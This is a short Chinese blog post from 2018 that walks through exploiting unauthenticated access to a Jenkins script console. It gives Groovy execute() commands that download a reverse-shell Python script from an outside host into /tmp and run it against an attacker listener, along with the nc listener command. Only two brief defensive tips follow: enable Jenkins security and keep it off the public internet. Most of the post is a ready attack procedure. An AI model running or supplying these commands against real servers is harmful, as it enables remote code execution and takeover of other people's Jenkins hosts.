Jenkins未授权访问脚本执行漏洞

2018/05/17 11:15
阅读数 204

Jenkins未授权访问脚本执行漏洞

步骤

首先找一个站点挂上一个反弹shell脚本,然后在脚本执行框里执行脚本进行下载到tmp目录:

println "wget http://47.95.XXX.XXX/xxx.py -P /tmp/".execute().text

执行成功下面Result并没有反馈

然后我们执行命令允许反弹shell脚本

println "python /tmp/xxx.py 140.143.xxx.xxx 1234".execute().text

 

此时我们在140.143.xxx.xxx主机上使用nc监听1234端口

nc -l -p 1234

 

ifconfig 查看ip

查看一下当前用户 w命令

防御措施:

1.Jenkins访问进行密码加密

Manage Jenkins -> Configure System -> Enable Security

 

2.不暴露在公网上

展开阅读全文
打赏
0
0 收藏
分享
加载中
更多评论
打赏
0 评论
0 收藏
0
分享
返回顶部
顶部